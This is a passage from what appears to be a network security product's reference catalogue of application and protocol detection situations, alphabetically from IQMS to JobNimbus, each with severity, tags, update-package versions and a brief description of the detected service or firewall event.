Description: IQMS Means Manufacturing. IQMS modern ERP and MES software is tailored specifically for the manufacturing environment. IQMS understand manufacturing challenges and work hard to deliver quality solutions that allow our customers to run their businesses better.
Back to top

IQNavigator

About this situation: Application IQNavigator detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IQNavigator provides a Vendor Management System (VMS) to aid in vendor management, services procurement, and acquiring contingent labor forces.
Back to top

IQTimecard

About this situation: Application IQTimecard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IQTimecard is a fully hosted Electronic Call Monitoring (ELM) application developed to provide lcomprehensive real time workforce management.
Back to top

Iquotexpress

About this situation: Application Iquotexpress detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iQuote Xpress is a 24
Back to top

IRC

About this situation: Internet Relay Chat (IRC) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Chat
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1162-5242
Description: Internet Relay Chat (IRC) usage. IRC is a protocol for real-time internet chatting.
Back to top

iRecruit

About this situation: Application iRecruit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iRecruit is a hosted SaaS
Back to top

IRemUnknown2

About this situation: MSRPC protocol traffic to IRemUnknown2 Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Auxiliary
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to IRemUnknown2 Interface. IRemUnknown/IRemUnknown2 is a COM interface designed to handle reference counting and interface querying for remote objects. IRemUnknown2 was introduced in version 5.2 of the DCOM protocol. This Application requires engine version 5.7.4 or higher.
Back to top

Iridize

About this situation: Application Iridize detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Iridize is the affordable, bottom line SaaS customer success solution that offer tools to improve customer acquisition, cure churn and grow customer value.
Back to top

Iris

About this situation: Application Iris detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IRIS is the UK's market provider of business critical software and services to the UK accountancy and payroll sectors.
Back to top

Ironmountain

About this situation: Application Ironmountain detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Iron Mountain Incorporated
Back to top

ISAKMP

About this situation: ISAKMP traffic
Context: Application Context
Severity: 1
Tags: Protocols, Tunneling
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-1280-5242
Description: Internet Security Association and Key Management Protocol traffic has been detected.
Back to top

ISBA

About this situation: Application ISBA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: International Society for Bayesian Analysis created to promote the development and application of Bayesian analysis useful in the solution of theoretical and applied problems in science, industry and government.
Back to top

ISBA-Fastcase

About this situation: Application ISBA-Fastcase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Illinois State Bar Association provides smart legal research app
Back to top

iScripts-MultiCart

About this situation: Application iScripts-MultiCart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iScripts MultiCart is a shopping cart solution enables you to have one store front and multiple vendors.
Back to top

iSCSI

About this situation: iSCSI traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-636-5211
Description: iCSCI (Internet Small Computer System Interface) is a protocol for connecting storage devices over a network using TCP/IP. It can be used over a local area network (LAN), a wide area network (WAN), or the Internet.
Back to top

iShares-529

About this situation: Application iShares-529 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iShares are a family of exchange-traded funds (ETFs) managed by BlackRock. iShares funds: London Stock Exchange, American Stock Exchange, New York Stock Exchange, BATS Exchange, Hong Kong Stock Exchange, Toronto Stock Exchange, Australian Securities Exchange and several European and Asian stock exchanges. iShares is the largest issuer of ETFs in the US and globally
Back to top

Isl-Light

About this situation: ISL Light usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A remote desktop-sharing application
Back to top

ISNetworld

About this situation: Application ISNetworld detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ISNetworld is a global resource for connecting Hiring Clients with safe and reliable contractors.
Back to top

ISNIC-Registry

About this situation: Application ISNIC-Registry detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ISNIC - manages the registry for the .is country-code domain according to the principles specified in the registration rules of .is domains.
Back to top

ISO-13485-Quality-Management

About this situation: Application ISO-13485-Quality-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ISOXpress is a Regulatory Compliance, Document Control, and Quality System Management software for operating ISO 13485 and FDA 21 CFR part 820 quality systems
Back to top

Isohunt

About this situation: isoHunt usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A peer-to-peer (P2P) download service that allows users to search for torrent files with various types of content (for example, pirated software, movies, and music)
Back to top

IsoMetrix

About this situation: Application IsoMetrix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IsoMetrix offers software and management solutions for GRC, HSE, social sustainability health for efficiency and compliance.
Back to top

isoTracker-Complaints-Management-Software

About this situation: Application isoTracker-Complaints-Management-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IsoTracker provides a centralized interface for recording and tracking complaints from any location whether from your desk while responding to a customers call or out in the field with the customer.
Back to top

isoTracker-QMS-software

About this situation: Application isoTracker-QMS-software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Lennox Hill - cloud-based quality management software system that offers a comprehensive set of quality management software applications. Includes document control, complaints management, audits, non-conformance reporting, CAPA and escalation.
Back to top

Ispirante

About this situation: Application Ispirante detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ispirante - is a solution for analyzing help desk performance and learning insights for improving customer satisfaction.
Back to top

iSpot.tv

About this situation: iSpot.tv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-1732-5242
Last changed: sgpkg-ips-1732-5242
Description: iSpot.tv provides analytics and television advertisement data.
Back to top

Issinc

About this situation: Application Issinc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Intelligent Software Solutions
Back to top

IssueTrak

About this situation: Application IssueTrak detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IssueTrak, Inc., has a seasoned management team, with expertise in Help and Service Desk technology, and significant experience with early stage, medium, and large technology companies.
Back to top

Issuu

About this situation: Issuu usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This service allows users to upload, create, and view portfolios, books, magazine issues, newspapers, and other print media. Source: Wikipedia
Back to top

Istock

About this situation: iStock usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: iStock, originally iStockphoto was a free stock imagery website. It is an online, royalty free, international microstock photography provider operating with the micropayment business model. Images cost between 1 and 150 credits, depending on size and image collection. A new keywording taxonomy called a Controlled vocabulary was borrowed from Getty Images and implemented on iStockphoto to control and manage keywords and searches, and to provide multilingual searching abilities.
Back to top

ISystemActivator

About this situation: MSRPC protocol traffic to ISystemActivator Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Auxiliary
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-815-5242
Description: ISystemActivator (IRemoteSCMActivator) is a remote activation interface of the DCOM Remote Protocol. This Application requires engine version 5.7.4 or higher.
Back to top

itDuzzit

About this situation: Application itDuzzit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: itDuzzit is a cloud integration platform that offers pre-built integration solutions and connectors for several cloud (web) applications.
Back to top

Iterable

About this situation: Iterable usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1723-5242
Description: Iterable is a data driven customer messaging and interaction platform. It collects tracking data from users to promote products using AI via messaging platform.Iterable is required by some applications to be allowed in the network policy for build-in customer service and messaging.
Back to top

Iteris

About this situation: Application Iteris detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Iteris is a service that provides intelligent information solutions to the traffic management market. By combining IP, products it offers a range of Intelligent Transportation System
Back to top

ITEXPERT

About this situation: Application ITEXPERT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ITEXPERT is a company that provides IT consulting and IT solutions integration.
Back to top

Itg

About this situation: Application Itg detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ITG is an independent execution and research broker partnering with global portfolio managers and traders throughout the investment process, from investment decision through to settlement.
Back to top

ITM-Platform

About this situation: Application ITM-Platform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ITM Platform is a online software for the management of projects, tasks, resources and costs within a collaborative working context.
Back to top

iTRAK

About this situation: Application iTRAK detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iTRAK designs, develops, implements, and supports technologically wireless GPS
Back to top

Itris

About this situation: Application Itris detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ITRIS computer science is a provider of enterprise-wide data and storage solutions. ITRIS core competencies include the following areas
Back to top

ITRP

About this situation: Application ITRP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ITRP is a cloud-based IT service management application. ITRP allows IT service providers to track the service levels of the services they provide to their customers, as well as the service levels they obtain from their outsourcers and cloud service providers.
Back to top

iTunes

About this situation: Endpoint Context Agent based Apple iTunes
Context: EI Correlation
Severity: 1
Tags: Mobile Software, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description: iTunes endpoint application has been detected. iTunes is a Apple's mobile phone syncronization and management software.
Back to top

Itv-Player

About this situation: ITV Player usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: An Internet TV service.
Back to top

IUID_Cannot_connect

About this situation: Cannot connect to server
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: Cannot query user information from one of the defined servers. Possible causes include connectivity issues, configuration issues and server internal issues. Activate diagnostics for more detailed information.
Back to top

IUID_Connection_Restored

About this situation: Server connection restored
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: Server connectivity has returned to normal after disconnection.
Back to top

IUID_Diagnostic_Error

About this situation: Diagnostic error message
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: Diagnostic error message. See Information Message field for details.
Back to top

IUID_Diagnostic_Info

About this situation: Diagnostic info message
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: Diagnostic message. See Information Message field for details.
Back to top

iVantage-Health-Analytics

About this situation: Application iVantage-Health-Analytics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iVantage provides hospitals and healthcare systems with performance management analytic tools for benchmarking, strategic planning and payment optimization.
Back to top

iVend-eCommerce

About this situation: Application iVend-eCommerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iVend is an eCommerce, mCommerce platform allowing organizations to offer their products on the web the same way they would at a physical store.
Back to top

Ivideochat

About this situation: iVideoChat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: An online, web-based chat service that allows users to send instant messages to each other using a web browser
Back to top

Iwantim

About this situation: Application Iwantim detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Iwantim.com Web Messenger connects you to Web Msn Messenger, Skype, Yahoo Messenger, Facebook Chat, AIM, ICQ, GTalk and more messenger networks.
Back to top

Ixiacom

About this situation: Application Ixiacom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ixia provides application performance and security resilience solutions to validate, secure, and optimize businesses physic al and virtual networks. Enterprises, service providers, network equipment manufacturers, and governments worldwide rely on Ixia's solutions to deploy new technologies and achieve efficient, secure, ongoing operation of their networks.
Back to top

Ixl

About this situation: Ixl usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1764-5242
Description: Ixl usage detected. Ixl is a mathematics and language learning website.
Back to top

Izenda-Embedded-BI

About this situation: Application Izenda-Embedded-BI detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Izenda, an embedded self-service BI platform that is completely web-based, empowers business users to create ad hoc reports, dashboards and visualizations without heavy IT demands.
Back to top

j2-Global

About this situation: Application j2-Global detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: j2 Global is a publicly traded cloud services, unified communications, and digital media company offering a patented suite of tools to consumers and the Fortune 500. j2 also owns a host of popular digital media publications under its Ziff-Davis division.
Back to top

Jabber

About this situation: Jabber traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Chat
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-1096-5242
Description: Jabber - Extensible Messaging and Presence Protocol (XMPP) is an open instant messenger protocol, which is TCP-based and XML-encoded.
Back to top

Jacada

About this situation: Application Jacada detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jacada - is a software and services company which provides unified desktop and process optimization products for customer service and support
Back to top

Jackrabbit-Care

About this situation: Application Jackrabbit-Care detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jackrabbit Care is a service that helps to manage enrollment, scheduling, attendance, accounting, and communication for center, afterschool, and preschool programs.
Back to top

JadaSite

About this situation: Application JadaSite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JadaSite is a content management and e-commerce system.
Back to top

JadeSoftware

About this situation: Application JadeSoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JadeSoftware is a company that provides operational intelligence, mobile integration, investigations, risk management and logistics solutions.
Back to top

JaggedPeak

About this situation: Application JaggedPeak detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JaggedPeak is a provider of enterprise-class eCommerce solutions and supply chain services that influence the scalability, flexibility and profitability of multi-channel online businesses. Its technology is EDGE-an enterprise-class eCommerce platform that includes a eCommerce Platform
Back to top

jAlbum

About this situation: Application jAlbum detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jalbum-is the software allows users to manage their photo collection, sorting photos into albums, performing basic digital editing and commenting individual photos.
Back to top

Jamf-Now

About this situation: Application Jamf-Now detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jamf Now is an Apple Mobile Device Management
Back to top

Jango

About this situation: Jango usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: An Internet radio network
Back to top

Jaspersoft

About this situation: Application Jaspersoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jaspersoft is a business intelligence suite leverages open source for cost-effective reporting, dashboards analytics.
Back to top

Java SE 8

About this situation: Endpoint Context Agent based Java SE 8 detection
Context: EI Correlation
Severity: 1
Tags: Framework, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description: Java Standard Edition 8 endpoint application detected. Java Standard Edition 8, or Java SE 8, is a programming environment used for variety of purposes. It has been developed by Oracle, Inc.
Back to top

Java Update Scheduler

About this situation: Endpoint Context Agent based Java Update Scheduler detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Java Update Scheduler endpoint application has been detected. The process automatically checks for Java updates.
Back to top

Jay-Is-Games

About this situation: Jay is Games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Jazz

About this situation: Application Jazz detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jazz is IBM's initiative for improving collaboration across the software and systems lifecycle.
Back to top

JDASoftware

About this situation: Application JDASoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JDASoftware offers the supply chain, retail merchandising, store operations and channel commerce solutions to help companies manage the flow of goods from raw materials to finished products.
Back to top

Jedox

About this situation: Application Jedox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jedox unifies corporate performance management and business intelligence in a seamless software platform for the entire organization.
Back to top

Jeeves

About this situation: Application Jeeves detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jeeves Information Systems AB
Back to top

Jenkins

About this situation: Jenkins usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: Jenkins is an open source continuous integration (CI) tool written in Java. Jenkins is a server-based system that runs in a servlet container such as Apache Tomcat.
Back to top

Jenzabar

About this situation: Application Jenzabar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jenzabar is a provider of enterprise software, strategies, and services developed exclusively for higher education. Jenzabar integrated, innovative solutions advance the goals of academic and administrative offices across the campus and throughout the student lifecycle.
Back to top

Jersey-Connect

About this situation: Application Jersey-Connect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jersey Connect - network and technology services organization for all libraries in New Jersey
Back to top

Jet-Convert

About this situation: Application Jet-Convert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jet Convert delivers seamless MYOB to Xero conversion services for accountants and bookkeepers.
Back to top

JetBrains

About this situation: Application JetBrains detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JetBrains is a technology software development firm specializing in the creation of intelligent development tools.
Back to top

JetDirect

About this situation: JetDirect traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1158-5242
Last changed: sgpkg-ips-1399-5242
Description: JetDirect, also known as raw printing, is a protocol for controlling printing over network. This application can only detect Printer Job Language (PJL) messages. JetDirect service should be used for raw printing data.
Back to top

Jewelers-Board-of-Trade

About this situation: Application Jewelers-Board-of-Trade detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Jewelers Board of Trade is dedicated to the welfare of its members and the jewelry industry overall, providing industry specific credit information, collections and marketing services.
Back to top

JFrog

About this situation: JFrog usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1769-5242
Description: JFrog is an automation solution for building, testing and deploying software.
Back to top

Jiayuan.com

About this situation: Application Jiayuan.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jiayuan.com is an internet dating website in the People's Republic of China.
Back to top

JiGiY

About this situation: JiGiY usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-455-5211
Last changed: sgpkg-ips-630-5211
Description: JiGiY is an HD YouTube converter that allows users to download high definition Youtube videos and then convert them to different media format.
Back to top

Jigoshop

About this situation: Application Jigoshop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jigoshop provides eCommerce solutions that allows to upload products and take payments with PayPal and Skrill, Moneybookers.
Back to top

Jigzone

About this situation: JigZone usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Jimdo

About this situation: Application Jimdo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jimdo is a web hosting service. Jimdo includes JimdoFree service, JimdoPro and JimdoBusiness as a premium services.
Back to top

Jiransoft

About this situation: Application Jiransoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jiransoft a software vendor in Korea and Japan. Jiransoft major fields cover security and productivity and collaboration solution for enterprises.
Back to top

Jitbit-CRM

About this situation: Jitbit CRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Jitsi-Meeting

About this situation: Jitsi Meeting usage detected.
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-1634-5242
Last changed: sgpkg-ips-1769-5242
Description: Jitsi Meeting is a communications service that allows users to conduct discussions and collaborate online through audio, video, and screen sharing.
Back to top

Jitterbit

About this situation: Application Jitterbit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jitterbit is agile cloud integration solution for today's modern architecture, rapidly connecting any on-premise, Cloud, Social, and Mobile apps
Back to top

Jive

About this situation: Application Jive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jives software combines the community software, collaboration software, social networking software, and social media monitoring offerings into an integrated platform.
Back to top

Jive-Hosted

About this situation: Application Jive-Hosted detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jive Communications provides enterprise-grade Hosted VoIP and Unified Communications to businesses and institutions.
Back to top

jiveSYSTEMS

About this situation: Application jiveSYSTEMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: jiveSYSTEMS offers video email marketing software and training.
Back to top

Job Search

About this situation: Sites that offer information about or support the seeking of employment or employees.
Context: URL Application Context
Severity: 1
Tags: Job Search, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer information about or support the seeking of employment or employees.
Back to top

Job-Manager

About this situation: Application Job-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Job Manager - suite of financial management tools that enable users to accurately create estimates and quotes, monitor job costs, generate on-demand reporting and invoices, and share information with industry leading accounting systems.
Back to top

JobAdder

About this situation: Application JobAdder detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JobAdder manages and organizes the recruitment process for anyone who hires people, offering simplicity, mobility and superior support.
Back to top

Jobaline

About this situation: Application Jobaline detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Jobaline.com is a mobile-first, bilingual jobs marketplace that makes it easy for the more than 75 million hourly workers in the United States to find and apply for jobs from any mobile phone, tablet or computer.
Back to top

Jobber

About this situation: Application Jobber detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Scheduling, Invoicing Billing, Client Management, Time Tracking and more for Field Service Pros. Jobber is the easiest to use mobile business software.
Back to top

JobDescriptions.com

About this situation: Application JobDescriptions.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: JobDescription.com for writing and creating individual, customized job descriptions for your organization is fast, easy and done completely online. Browse through the sample job descriptions.
Back to top

JobNimbus

About this situation: Application JobNimbus detected
Context: Application Context
Severity: 1
